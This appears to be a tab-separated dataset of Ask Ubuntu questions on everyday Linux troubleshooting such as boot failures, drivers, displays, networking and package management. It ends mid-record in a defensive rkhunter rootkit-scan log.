440023	installation fails when installing 64-bit version of ubuntu but not 32 bit	i have a flash drive with ubuntu 13.10 on it that i 'm trying to install . when i try and install the 64 bit version on my computer i get this error : kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) i only get this error when i try and install the 64 bit version . all my hardware is 64 bit hardware . i searched high and low to find a solution , but nothing seemed relevant to the issue i was having . . when i try and boot from flash drive , it gives me that error . even if i select try ubuntu without installing .
440024	boot repair : `` grub is still present . please try again `` message is displayed while reparing the boot having windows 8.1 and ubuntu 13.10	i was dual booting winodws 8.1 and ubuntu 13.10 . i have updated my windows bios . after that i am always getting into windows . grub menu is not displayed . so , using ubuntu 12.10 live cd ( but i have 13.10 in my lap ) , i have repaired the boot to fix this issue . when i clicked boot repair , it says `` uefi is detected '' i have choosen the recommended repair and it ends up with some commands sudo chroot `` /mnt/boot-sav/sda7 '' dpkg -- configure -a sudo chroot `` /mnt/boot-sav/sda7 '' apt-get install -fy sudo chroot `` /mnt/boot-sav/sda7 '' apt-get purge -y -- force-yes grub*shim-signed linux-signed* after that , on clicking forward in the boot repair , got some error message like `` grub is still present . please try again '' pastebin ref : http : //paste.ubuntu.com/7164372/ bios settings : secured boot : disabled os type : uefi kindly help guys . thanks
440027	ubuntu as router with wifi and tor	bear with me on this one please i live in a country with censorship and the government has been shutting down access to certain websites and its thinking about shutting down access to twitter and facebook , as well as other social media sites . so what i have to work with is this , a wifi router , an ubuntu box with 2 ethernet connections and my internet router . this is what i would like to do , to connect the cable modem to my ubuntu box , and then connect my ubuntu box to my wifi router to then give access to all the devices in my house , i was wondering if there was a way to install something like tor or vidalia on the ubuntu box and route all blocked traffic through tor so all devices could access the blocked sites without installing tor in every device .
440028	laptop screen blank when i connect an external monitor ( which works )	i have connected an external monitor to my laptop via vga . however i ca n't get both working at the same time . what i wanted was for the external monitor to be a continuation of my laptop , however when i go to that mode i can see the external monitor working as expected while my monitor stays blank . i 'm relatively new to linux , so if there 's need for me to provide more information please ask . kind regards , daniel
440031	driver for wnda3100v2	dell dimension 3000 ubuntu 12.04.4 netgear wnda3100v2 usb network adapter is there a driver for this , or do we need a different adapter ?
440033	when using bumblebee , how do i query the current state of the nvidia card ?	i am using ubuntu 13.10 , and have bumblebee installed . i can see that bumblebeed is running . i would like to test whether the nvidia card is currently powered . can i do this ?
440036	in .bashrc how to use the output of `` uname -m '' as path ( i get error : `` uname : no such file or directory '' ) ?	in my $ home/.bashrc i defined the following variable : arch= '' uname -m '' calling from the terminal : $ arch i 'd like to get : x86_64 and i get as i 'd like : x86_64 but calling : local/ $ arch i 'd like to get : local/x86_64 and i get : local/uname : no such file or directory -- > = ( does anybody know what to change ?
440037	using regex breaking a text on the last digit using linux tools like sed , or awk	i have the following list that i want to break on the digit . for example : from : 103ru 103mrh 104 1041 to : 103 ru 103 mrh 104 1041 i would like to use regx with sed or maybe awk in order to achieve this result . but most of my approaches failed . i need some advice or possibly some solution . thanks
440038	lenovo t440p dual screen	just bought a lenovo t440p with an ultra dock , do n't have nvidea bought with intel graphics . i want to use dual monitor with displayport , not including the laptops lcd . the problem that i am having is that i can connect two monitors but they are cloned not dual monitors . the two monitors are two 24 '' dell that ubuntu 13.10 identifies correctly but only as one under display . where is the other one ? i tried using win8 and it works fine so there is no hardware problem . output of xrandr -q : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - screen 0 : minimum 320 x 200 , current 1920 x 1200 , maximum 32767 x 32767 edp1 connected ( normal left inverted right x axis y axis ) 1600x900 60.0 + 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp2 connected primary 1920x1200+0+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 3840x1200 60.0 2560x1024 60.0 1920x1080 60.0 1600x1200 60.0 1680x1050 60.0 1280x1024 60.0 1280x960 60.0 1024x768 60.0 800x600 60.3 640x480 60.0 720x400 70.1 hdmi2 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - have tried changing but with no luck . uname output : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - linux krilen-thinkpad-t440p 3.11.0-18-generic # 32-ubuntu smp tue feb 18 21:11:14 utc 2014 x86_64 x86_64 x86_64 gnu/linux -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - have also installed fedora 20 and ubuntugnome with the same results . is there anyone out there that can point me in the direction to get two monitor working as dual head . any help is appreciated , thanks in advanced . /krister
440040	how to recover files in lost.dir when file type is unknown ?	all solutions i found on google are made for windoz.ive tried file * and the results do n't say what exactly the file type is.for example is data an application or an image ? 10 : foxpro fpt , blocks size 0 , next free block index 805961728 285218 : data 285302 : data 369456 : parix executable 369458 : data what is parix executable and foxpro fpt ? can the file * command be wrong ? how to find out what the file extension is ( for example .flac for lossless music or .png for picture )
440042	why after installing ubuntu by pxe it never has internet or internet connectivity ?	i 've even trying for weeks to install ubuntu over the the network . i have been successful at setting up my ubuntu server and also i am able to get my clients to pxe boot and everything else is working fine except that after the installation there is no internet . i am having an issue where `` iface eth0 inet dhcp '' changes to `` iface eth0 inet manual '' no matter what image i use , i always get the same result why ? why i is there never network connectivity after installation ? i read about it being a bug here https : //bugs.launchpad.net/ubuntu/+s ... ty/+bug/388060 and here https : //bugs.launchpad.net/ubuntu/+s ... er/+bug/946215 i am not sure what to do is there a guide to fix this issue ?
440044	where is the place downloaded program from apt-get	when we download a binary debian program from repository by this command : sudo apt-get install something where is this program store and all of executable files ?
440045	how to connect to ethernet ?	custom built computer running ubuntu 12.04 lts , attempting to connect to university lan . ubuntu recognizes both motherboard 's qualcomm atheros and pci connected realtek lan adapters . already did $ sudo modprobe 8139too $ sudo lsmod and added `` blacklist 8131cp '' to blacklist.conf , to no avail . any ping commands simply say there is no connection . is this more likely a problem with the network doing mac discrimination ? would n't my computer at least see that there is something connected on the ethernet ? btw i have tried multiple ethernet cables .
440046	linking cxx executable remotezynaddsubfx	i 'm trying to build the latest version of lmms v1.0.0 and i 'm running into this error linking cxx executable remotezynaddsubfx /usr/bin/ld : can not find -lxft /usr/bin/ld : can not find -lfontconfig /usr/bin/ld : can not find -lxinerama collect2 : error : ld returned 1 exit status make [ 2 ] : * [ plugins/zynaddsubfx/remotezynaddsubfx ] error 1 make [ 1 ] : [ plugins/zynaddsubfx/cmakefiles/remotezynaddsubfx.dir/all ] error 2 make : ** [ all ] error 2 what i gather is it ca n't find these 3 things to link to ? where do i find them and then link them ? much appreciated in advance !
440047	command line to check version of a file with wget ?	http : //paste.ubuntu.com/7159470/ is there a way to check the version of a file using wget , and then download it if it 's newer ? trying to make an update script/launcher for a game . wget http : //testing.albiononline.com/clients/albion-online-client-linux.zip
440051	upgrade after effects ... there is no window manager at startup	i just upgraded to ubuntu 13.10 after hours of installing apps and configuration . i got many error messages , in the end it run dpkg -- configure -a and reverted installation . luckily it booted well and opened desktop but there is no window manager . do i have to add window manager to startup application list or is there any other simple way to fix it ?
440053	ubuntu server 12.04 normal boot show login screen	my computer will boot fine in recovery , but during normal boot it wo n't boot to login screen . i tried the same setup on a virtual machine and it works fine so , so that leads me to think a hardware issue . any thought 's on how to fix this ?
440058	i get the following errors when i use sudo apt-get update	w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/saucy/release unable to find expected entry 'main/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) i think need to edit this from main/binary-1386/packages to main/binary-i386/packages . i 'm new to ubuntu so could someone give me a step by step guide to finding and altering this entry ?
440059	remap side touch button on microsoft sculpt comfort mouse	i recently purchased a microsoft sculpt comfort mouse . it uses bluetooth to connect to my laptop and all regular mouse buttons work perfect under both linux and windows 7 . what 's different about this mouse , though , is that it has a special windows/super key on the side that launches the start/menu when pressed . it also has a touch sensor that detects when the side button is stroked up or down and vibrates the mouse to acknowledge it 's been activated . of course in windows there is a program that lets me change what the strokes do and turn off the vibration . in linux , xev detects only a normal keystroke when the side button is pressed or swiped . xev does n't report any mouse button presses . so my question is , can i change what keys presses are sent when under linux ? i would love to change the key binding from tab for down , backspace for up , ( what xev reports ) to ctrl+alt+left/right to switch between workspaces . thanks for any help !
440060	do i need to make a bootable cd	i have windows 8 , i already choose the option of try and install , and after the computer restarts it does n't start . i have it mounted on a virtual drive . do i need to make a bootable cd if i want to install it ?
440062	making bublebee not work	i have laptop with optimus , and with bumblebee properly installed . i want to play dota 2 and my nvidia card apparently hates it , to the point of no repair . i tried everything i managed to find , even the specific fix ( with setting -nod3d9ex as launch options on steam ) and still no success . the thing is , it worked when i was using windows 7 with bugged optimus , always choosing intel integrated card , so i know it works on it . my question is : is there a config file somewhere that i can use to make bumblebee not activate nvidia for a specific program ? i 'm pretty sure that would fix my problem . ( also if you ever consider buying anything nvidia related for the love of god , do n't do it )
440073	dragging and resizing shortcuts in xfce	i use xubuntu 12.04 , and since i am on a laptop , i try to save on screen estate by using a minimalistic window theme i found here : http : //kira28.deviantart.com/art/xfwm4-theme-tillsummer-366057630 this means that in order to resize and drag windows i am using mostly alt + left/right click , this works but for convenience i would like to add another short cut , for example : - left + right click at the same time to drag a window - middle click to resize a window i have n't found any easy way to do this , the only option i see in the settings is changing the modifier to ctrl/super instead of alt , but that 's not really what i am looking for . regards ,
440078	changing brightness xubuntu [ 13.10 ]	i can not change the screen brightness on xubuntu 13.10 . i am running a toshiba satellite laptop , using the proprietary fglrx amd drivers , and have tried the acpi_vender etc . kernel parameters ( do not work ) . the brightness indicator does appear when i attempt to change the brightness , and the meter does change level , it 's just that nothing actually happens . additionally xbacklight -get does show different values when `` changing the brightness '' , so something is being modified , it 's just that in reality nothing changes . to recap : xubuntu thinks the brightness is changing ; it is n't actually . note : i ran elementaryos off a liveusb , and i could change the brightness . eos is based on 12.04 , which seems to suggest a reinstall/downgrade from 13.10 to 12.04 might fix these issues . not being able to change the brightness is a dealbreaker ; it 's a major issue . any help appreciated . edit found something that sort of works . xrandr -- output lvds -- brightness 0.5 . it 's very impractical to use this though , so i would prefer the regular fn keys to work . so the original issue still stands .
440079	ubuntu repositories : difference between samba and samba4	as in the title , i found in the ubuntu repositories two packages , named samba and samba4 . which is the actual difference ? i tried to install samba , but the service did n't seem to be active . then i installed samba4 and it directly went to the configuration wizard . do i have redundant files now ? ( moved this question to this section from unix & linux )
440081	how to install the tevii s662 driver ?	well . i 've downloaded the tevii_product_20140130_media_build_b51.tar.bz2.rar driver tarball to ~ from the homepage , installed the prerequisites ( git libproc-processtable-perl patchutils make gcc ) on a fresh installed ubuntu-13.10-server-amd64.iso tar xfv the .bz2 file , went into the directory , and gave ./build command . everything went fine . still after reboot i see jactek instead of tevii s662 . any ideas please ?
440085	how do you superimpose a game running in windowed mode over the unity sidebar ?	i like running games like garrysmod and killing floor in windowed mode . the windows get cut off slightly by the sidebar . is there a method where you can have the window above the bar as well as the top panel ?
440087	how do i get information from the logs on my computer when i only have access to the command line ?	for various reasons i can no longer access my graphical desktop , and can only login via a tty ( ctrl+alt+f1 through f6 by default ) . to help diagnose and solve my problem i need to look through the logs and maybe put some of the info into my question or forum thread . how can i get this information ?
440089	why are the 'xx packages can be updated ' lines repeated twice ?	when i logged in to my ubuntu 12.04 32-bit server this morning over ssh , i saw this at the end of the 'welcome ' screen : graph this data and manage this system at : https : //landscape.canonical.com/ 18 packages can be updated . 5 updates are security updates . 18 packages can be updated . 5 updates are security updates . *** system restart required *** last login : thu mar 27 14:59:24 2014 from 192.168.0.7 me @ server1 : ~ $ i 'm used to seeing 'xx packages can be updated , yy updates are security updates ' , but i 've never seen those lines repeated twice . i 'm absolutely sure it is n't a terminal scrolling/overwriting issue . the issue persists after a reboot . is this bad ? how can i make it only show once ?
440092	transitioning external drive to new ubuntu thinkpad	i 'm an ubuntu newbie , which i 'm sure the forum is not thrilled to ever hear as an opener . but after some setups are done , i think many of my ubuntu questions can be answered by past threads . the online community for ubuntu is rich , and that 's one of the reasons i was attracted to it in the first place . i 'm a journalist and have an enormous amount of work backed up on a seagate freeagent desk 0.1 . i want to use it to transfer my carefully built filing system from my old dell latitude e6400 to my new lenovo thinkpad running ubuntu 13.10 . my hope is to use the ( pricey ) freeagent to transfer my files from the latitude and continue using the freeagent as a backup with the lenovo . ( i have a second , lesser-quality backup that nonetheless served me decently as a second backup , but only as a second backup . and , of course , there 's the latitude itself , but my work on it will more-or-less cease accumulating . ) the freeagent is plugged into the lenovo through a docking station usb , and most of the files appeared to have transferred okay , although my aforementioned careful ( and i mean careful ) filing system was thrown into utter chaos , which is deeply frustrating for anyone who accumulates pdfs and csvs in large quantities . i also tested dragging and dropping simple pdfs from my ubuntu desktop to the freeagent ( pdfs were created with simple print-to-file ) , and the freeagent did not like that very much , although it did seem tolerate a libre writer doc dragged into the freeagent window from the desktop . any thoughts on this ? i 've had success navigating workarounds to get my external monitor and printer both operable on ubuntu . if i can get this last step completed of moving a ton of work to my new machine , i think i can patiently tackle the rest of ubuntu by reading previous threads and keeping plenty of user manuals around . but to an editor on deadline , `` i 'm learning ubuntu '' pretty much translates to `` a yorkie devoured my homework . '' needless to say , i 'm under some time constraints here and doing the best i can .
440093	black screen after aticonfig -- adapter=all '' -- initial . ( 12.04 lts )	to keep it simple and not bore you with a story . fresh install of ubuntu 12.04 lts from usb stick . have r9 280x msi gaming 3g video cards ( all cards supported by catalyst drivers ) . after install of operating system , i get into ubuntu using `` nomodeset '' in grub . i run sudo apt-get install fglrx-updates fglrx-amdcccle-updates fglrx-updates-dev reboot , it starts up fine ( without needing to go into grub ) . then i run sudo aticonfig -- lsa and all my cards show up . but when i run , sudo aticonfig -- adapter=all -- initial i can not boot up ubuntu . it just loads into a blank screen , no cursor . -my hardware works ( tested it all before ) . any ideas ?
440094	how to append a password to hidden files ?	i have some hidden files on my desktop the `` ctrl+h '' kind of hidden files . but i 'm not satisfied with the security in the process . anyone whose had much experience with ubuntu will surely know to press crtl+h to see your files , which is surely a problem .
440095	how to fix 0xc0000098 error	i am having issues with trying to install ubuntu through windows , i can download either installer fine and they run okay , however as i soon as i try to boot up ubuntu i get the 0xc0000098 error . windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do not have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc0000098 info : the selected entry could not be loaded because the application is missing or corrupt . it is not missing as when i check the folder it is there and have tried replacing it with the otherwise located ones directly and by changing the path name . i follow these steps to try and resolve the matter but to no avail . whenever i run the repair it always finds the same issue with fwbootmbr and will not fix it . is there a way i can do this manually from the command prompt ? i am running an acer travelmate on windows 7 pro . i can always get my laptop back to a healthy windows 7 version but can not get a healthy system with windows 7 as default and ubuntu installed into the using the wubi . i also happen to have a dell inspiron running windows 7 home premium which works fine with the wubi installer so i am really at my wits end trying to figure out what to do next and re installing windows 7 and then all the drivers is long and time consuming and i 'd really like to get this resolved so i can get on with a programming assignment .
440097	how to uninstall ubuntu without replacing it with something else ?	my last day at work is tomorrow . i 've had an ubuntu 12.04 ( laptop ) system for several years and would like to completely remove the os from the machine altogether . since i 'll be turning my laptop in to hr , i do n't need/want to replace it with anything . all the tutorials i 've read involve a `` drop-n-swap '' method where you basically just install a new os ( windows , etc . ) over ubuntu and essentially blow it out of your drive . but i do n't want to do that . i want to strip the machine down to bare metal ( bios , etc. ) . is this possible ? if not , why , and what it my best next alternative ? if it is possible , what are the steps ?
440098	how do i get a wireless usb keyboard to to wake ubuntu 13.10 from suspend ?	my pc with ubuntu 13.10 is set to suspend after 30 minutes of inactivity . up until it suspends i can resume working at any time using my logitech k400r wireless usb keyboard . the os defect/problem is that once it suspends - the wireless keyboard can no longer wake the suspended ubuntu 13.10 . this appears to be a ubuntu specific problem because the same pc when booted up with ms windows 7 always wakes up from sleep mode when you press any key on the logitech keyboard . i imagine something in ubuntu is causing the usb to go into a different state from what windows 7 puts it in . does anyone have any ideas how to overcome this issue as the only way to wake the pc is to walk up to it and push the power button for a short period once . while this power button wakes up the pc it then displays a number of error messages about sound , networking etc being down ... .which do go away after a few minutes of what seems to be the os recovering from suspend . not sure if this is normal linux behaviour due to my short experience with this os . again could anyone help with some details on whether there is any setting that would help keep the wireless usb keyboard alive just enough to wake the pc ? many thanks .
440100	installing android sdk on ubuntu ( 12.04 or above ) 64 bit without ia32-libs	i have ubuntu 12.04 lts . after following the official steps to install android sdk and adt bundle on a linux machine , i was n't able to run the sdk as some of the binaries in it needed 32 bit libraries . almost all the highly voted answers to this quandary in this forum and elsewhere suggest the installation of ia32-libs . for reasons , i simply could not install ia32-libs . i had this exact problem 6 months ago , at which i was able to follow the solution provided here to install this package . but now even this does n't work anymore and the error being package not available . so instead of installing ( or trying to install ) ia32-libs , i would like to install the minimal set of 32 bit libraries that are needed by the android sdk for my 64 bit ubuntu 12.04 os . so what is this minimal set ? from my initial search the minimal set seems to be : lib32z1 , lib32ncurses5 , lib32bz2-1.0 , lib32stdc++6 . but i am not sure .
440103	is it possible to have a full ubuntu install on a flash drive ?	i am trying to make a full ubuntu install on my 16 gb flash drive . i currently have a persistent edubuntu 12.04 lts on it , but this is the install version , which has an annoying `` try ubuntu '' button , as well as a `` install ubuntu 12.04 lts '' app in it . is this possible ?
440104	how to get windows boot loader back	i uninstalled ubuntu 32 bit to get ubuntu 64 bit but when i did that when i turn on my pc when i try to go to windows and get a black screen that just blinks and i do not have a windows disk
440105	non-intentional 'd ' key disabling	in an attempt to disable my insert key i have disabled the `` d '' key on my keypad . i am desperate to get this key back but when i tried to retrace my steps it still does n't work . edited for clarity in an attempt to isable my insert key i have isable one of the letters on my keypa ( can you guess which ) . i am esperate to get this key back but when i trie to retrace my steps it still oes n't work . help ! i nee to get the 'd ' key back !
440106	12.04 - problems installing netis wf-2120 wireless adapter driver	disclaimer : i 'm an ubuntu noob i recently bought a netis wf-2120 wireless adapter . it came with a disk which contained the linux driver . there is an install.sh file , so i run the command : sudo sh install.sh this is what i end up getting : authentication requested [ root ] for make driver : install.sh : 14 : [ : unexpected operator make arch=x86_64 cross_compile= -c /lib/modules/3.11.0-18-generic/build m=/home/mack/downloads/driver/rtl8192cu_8188cus_8188ce-vau_linux_v3.0.2164.20110715/driver/rtl8192_8188cu_linux_v3.0.2164.20110715 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-18-generic' cc [ m ] /home/mack/downloads/driver/rtl8192cu_8188cus_8188ce-vau_linux_v3.0.2164.20110715/driver/rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_cmd.o in file included from /home/mack/downloads/driver/rtl8192cu_8188cus_8188ce-vau_linux_v3.0.2164.20110715/driver/rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_cmd.c:24:0 : /home/mack/downloads/driver/rtl8192cu_8188cus_8188ce-vau_linux_v3.0.2164.20110715/driver/rtl8192_8188cu_linux_v3.0.2164.20110715/include/osdep_service.h:49:29 : fatal error : linux/smp_lock.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /home/mack/downloads/driver/rtl8192cu_8188cus_8188ce-vau_linux_v3.0.2164.20110715/driver/rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_cmd.o ] error 1 make [ 1 ] : *** [ _module_/home/mack/downloads/driver/rtl8192cu_8188cus_8188ce-vau_linux_v3.0.2164.20110715/driver/rtl8192_8188cu_linux_v3.0.2164.20110715 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-18-generic' make : *** [ modules ] error 2 compile make driver error : 2 , please check error mesg i am nowhere near experienced enough to understand what the problem is . any help would be appreciated . thanks !
440107	is there a utility for hopping in and out of a cli ?	lets say i 've got a bit of server software . i start it up and it provides an interface on stdin/stdout that i can use to enter commands during runtime . i want to be able to start it up over ssh , exit the session , come back and hook right back into that stdin/stdout interface again . i was thinking there must be an easy command like nohup or & that would allow me to do this . is there ?
440112	i can not connect to internet with ethernet	i am completely new to this entire os and looks like i need some help . i just installed lubuntu 13.10 onto my old dell . the system runs great but i ca n't connect to the internet at all . ive searched for hours from previous post but nothing has helped . when i run terminal i get the following message : ifconfig -a eth0 link encap : ethernet hwaddr 00:11:11:0d:9e:45 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2488 errors:0 dropped:0 overruns:0 frame:0 tx packets:2488 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:196184 ( 196.1 kb ) tx bytes:196184 ( 196.1 kb ) ~ $ cat /etc/network/interfaces auto lo iface lo inet loopback also when i go into /etc/networkmanager/networkmanager.conf it had said `` managed=false '' but i figured out how to change it to `` managed=true '' still nothing ... i thought i had some computer coding background but man was i wrong . please help me with this ! im not even sure if the os can recognize the ethernet port ( it was working fine when i had windows on it prior to ubuntu install , and is the port that came with the computer ) and the internet is currently working with a ethernet wired pc in a different room .
440114	ubuntu 14.04 python 2.7 still default , set 3.x as default	please set 3.x python as default in 14.04 , currently even writing python in terminal starts 2.7
440115	how to use linux ppf patcher ( lppf ) ?	how can i patch a cd image with lppf found here ?
440116	installing ubuntu in blu studio 5.5	i need help installing ubuntu in my android device . anyone knows how to install ubuntu on this android device ? > > blu studio 5.5 < <
440117	ubuntu not seeing windows 7 in bootloader	while i was installing ubuntu i unplugged my windows 7 hdd so i would n't accidentally partition it . i installed ubuntu , shut off my computer , plugged back the hdd , rebooted ( and using the bios boot menu , selected ubuntu ) . ubuntu recognized the hdd with windows 7 on it , and can mount it fine . however , i can not get it added to the boot-loader . i have tried boot-repair with several different settings , and it detects windows 7 , but it does n't add it to the boot-loader . here are two of the boot repair logs http : //paste.ubuntu.com/7158644/ http : //paste.ubuntu.com/7164637/
440118	why does apt-get require sudo ?	this is probably a stupid question , but i recently realized that i have no idea why there 's no single-user functionality with apt-get . answers i 'm not looking for : '' it 's because apt writes to system-level directories '' . this is the surface-level why , but i 'm looking for a level deeper . is there something fundamentally blocking a single-user environment ( a la pip + virtualenv ) ? `` you can just build from source '' . this is a workaround , but does not address my question . i do n't want to fix a short-term issue , and i have root access on all of my machines anyway .
440122	realtek wifi attempts connections but never succeeds	i just did a reinstall of ubuntu 12.04 because i messed up trying to fix graphics card issues . now , whenever i try to connect to my wifi , it tries to connect for several minutes and then asks me for the password again . here is my relevant output for lspci : 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) 0d:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) 13:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) 13:00.1 sd host controller : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) and sudo lshw -c network : *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:0d:00.0 logical name : wlan0 version : 01 serial : 20:10:7a:6c : c8:35 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.11.0-18-generic firmware=n/a ip=192.168.0.13 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 ioport:3000 ( size=256 ) memory : c4500000-c4503fff
440127	should i install ubuntu 14.04 after release ?	will 14.04 be good for install just after release or shall i wait few months for it 's revision ?
440128	should i worry about these warnings when running `rkhunter -- check` ?	i have several warnings issued on the following log . can anyone determine if they are something i should be worried about ? bog @ bog-compaq-presario-cq60-notebook-pc : ~ $ sudo apt-get install rkhunter reading package lists ... done building dependency tree reading state information ... done rkhunter is already the newest version . the following packages were automatically installed and are no longer required : gir1.2-ubuntuoneui-3.0 calligra-l10n-engb nvidia-settings-304 language-pack-kde-en kde-l10n-engb libubuntuoneui-3.0-1 thunderbird-globalmenu language-pack-kde-en-base use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 7 not upgraded . bog @ bog-compaq-presario-cq60-notebook-pc : ~ $ sudo rkhunter -- check [ rootkit hunter version 1.3.8 ] checking system commands ... performing 'strings ' command checks checking 'strings ' command [ ok ] performing 'shared libraries ' checks checking for preloading variables [ none found ] checking for preloaded libraries [ none found ] checking ld_library_path variable [ not found ] performing file properties checks checking for prerequisites [ warning ] /usr/sbin/adduser [ ok ] /usr/sbin/chroot [ ok ] /usr/sbin/cron [ ok ] /usr/sbin/groupadd [ ok ] /usr/sbin/groupdel [ ok ] /usr/sbin/groupmod [ ok ] /usr/sbin/grpck [ ok ] /usr/sbin/nologin [ ok ] /usr/sbin/pwck [ ok ] /usr/sbin/rsyslogd [ ok ] /usr/sbin/tcpd [ ok ] /usr/sbin/useradd [ ok ] /usr/sbin/userdel [ ok ] /usr/sbin/usermod [ ok ] /usr/sbin/vipw [ ok ] /usr/bin/awk [ ok ] /usr/bin/basename [ ok ] /usr/bin/chattr [ ok ] /usr/bin/cut [ ok ] /usr/bin/diff [ ok ] /usr/bin/dirname [ ok ] /usr/bin/dpkg [ ok ] /usr/bin/dpkg-query [ ok ] /usr/bin/du [ ok ] /usr/bin/env [ ok ] /usr/bin/file [ warning ] /usr/bin/find [ ok ] /usr/bin/get [ ok ] /usr/bin/groups [ ok ] /usr/bin/head [ ok ] /usr/bin/id [ ok ] /usr/bin/killall [ ok ] /usr/bin/last [ ok ] /usr/bin/lastlog [ ok ] /usr/bin/ldd [ ok ] /usr/bin/less [ ok ] /usr/bin/locate [ ok ] /usr/bin/logger [ ok ] /usr/bin/lsattr [ ok ] /usr/bin/lsof [ ok ] /usr/bin/mail [ warning ] /usr/bin/md5sum [ ok ] /usr/bin/mlocate [ ok ] /usr/bin/newgrp [ ok ] /usr/bin/passwd [ ok ] /usr/bin/perl [ warning ] /usr/bin/pgrep [ ok ] /usr/bin/pstree [ ok ] /usr/bin/rkhunter [ ok ] /usr/bin/rpm [ warning ] /usr/bin/runcon [ ok ] /usr/bin/sha1sum [ ok ] /usr/bin/sha224sum [ ok ] /usr/bin/sha256sum [ ok ] /usr/bin/sha384sum [ ok ] /usr/bin/sha512sum [ ok ] /usr/bin/size [ ok ] /usr/bin/sort [ ok ] /usr/bin/stat [ ok ] /usr/bin/strace [ ok ] /usr/bin/strings [ ok ] /usr/bin/sudo [ warning ] /usr/bin/tail [ ok ] /usr/bin/test [ ok ] /usr/bin/top [ ok ] /usr/bin/touch [ ok ] /usr/bin/tr [ ok ] /usr/bin/uniq [ ok ] /usr/bin/users [ ok ] /usr/bin/vmstat [ ok ] /usr/bin/w [ ok ] /usr/bin/watch [ ok ] /usr/bin/wc [ ok ] /usr/bin/wget [ ok ] /usr/bin/whatis [ ok ] /usr/bin/whereis [ ok ] /usr/bin/which [ ok ] /usr/bin/who [ ok ] /usr/bin/whoami [ ok ] /usr/bin/unhide.rb [ warning ] /usr/bin/mawk [ ok ] /usr/bin/lwp-request [ ok ] /usr/bin/heirloom-mailx [ warning ] /usr/bin/w.procps [ ok ] /sbin/depmod [ ok ] /sbin/fsck [ ok ] /sbin/ifconfig [ ok ] /sbin/ifdown [ ok ] /sbin/ifup [ ok ] /sbin/init [ ok ] /sbin/insmod [ ok ] /sbin/ip [ ok ] /sbin/lsmod [ ok ] /sbin/modinfo [ ok ] /sbin/modprobe [ ok ] /sbin/rmmod [ ok ] /sbin/route [ ok ] /sbin/runlevel [ ok ] /sbin/sulogin [ ok ] /sbin/sysctl [ ok ] /bin/bash [ ok ] /bin/cat [ ok ] /bin/chmod [ ok ] /bin/chown [ ok ] /bin/cp [ ok ] /bin/date [ ok ] /bin/df [ ok ] /bin/dmesg [ ok ] /bin/echo [ ok ] /bin/ed [ ok ] /bin/egrep [ ok ] /bin/fgrep [ ok ] /bin/fuser [ ok ] /bin/grep [ ok ] /bin/ip [ ok ] /bin/kill [ ok ] /bin/less [ ok ] /bin/login [ ok ] /bin/ls [ ok ] /bin/lsmod [ ok ] /bin/mktemp [ ok ] /bin/more [ ok ] /bin/mount [ ok ] /bin/mv [ ok ] /bin/netstat [ ok ] /bin/ps [ ok ] /bin/pwd [ ok ] /bin/readlink [ ok ] /bin/sed [ ok ] /bin/sh [ ok ] /bin/su [ ok ] /bin/touch [ ok ] /bin/uname [ ok ] /bin/which [ ok ] /bin/dash [ ok ] [ press < enter > to continue ] checking for rootkits ... performing check of known rootkit files and directories 55808 trojan - variant a [ not found ] adm worm [ not found ] ajakit rootkit [ not found ] adore rootkit [ not found ] apa kit [ not found ] apache worm [ not found ] ambient ( ark ) rootkit [ not found ] balaur rootkit [ not found ] beastkit rootkit [ not found ] bex2 rootkit [ not found ] bobkit rootkit [ not found ] cb rootkit [ not found ] cinik worm ( slapper.b variant ) [ not found ] danny-boy 's abuse kit [ not found ] devil rootkit [ not found ] dica-kit rootkit [ not found ] dreams rootkit [ not found ] duarawkz rootkit [ not found ] enye lkm [ not found ] flea linux rootkit [ not found ] freebsd rootkit [ not found ] fu rootkit [ not found ] fuck`it rootkit [ not found ] gaskit rootkit [ not found ] heroin lkm [ not found ] hjc kit [ not found ] ignokit rootkit [ not found ] illogic rootkit 